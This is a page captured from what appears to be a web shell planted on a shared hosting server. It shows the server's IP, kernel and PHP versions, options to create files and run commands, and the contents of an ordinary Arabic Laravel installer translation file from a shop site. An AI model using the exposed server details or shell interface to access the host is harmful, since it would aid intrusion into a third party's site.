One Hat Cyber Team
Your IP :
18.119.28.119
Server IP :
192.185.194.254
Server :
Linux raider.websitewelcome.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Server Software :
Apache
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home2
/
glenar
/
shop.glenar.com
/
resources
/
lang
/
ar
/
View File Name :
installer_messages.php
<?php return [ /** * * Shared translations. * */ 'title' => 'تنصيب Laravel', 'next' => 'متابعة', /** * * Home page translations. * */ 'welcome' => [ 'title' => 'تنصيب Laravel', 'message' => 'أهلا بك في صفحة تنصيب Laravel', ], /** * * Requirements page translations. * */ 'requirements' => [ 'title' => 'المتطلبات', ], /** * * Permissions page translations. * */ 'permissions' => [ 'title' => 'تراخيص المجلدات', ], /** * * Environment page translations. * */ 'environment' => [ 'title' => 'الإعدادات', 'save' => 'حفظ ملف .env', 'success' => 'تم حفظ الإعدادات بنجاح', 'errors' => 'حدث خطأ أثناء إنشاء ملف .env. رجاءا قم بإنشاءه يدويا', ], /** * * Final page translations. * */ 'final' => [ 'title' => 'النهاية', 'finished' => 'تم تنصيب البرنامج بنجاح...', 'exit' => 'إضغط هنا للخروج', ], ];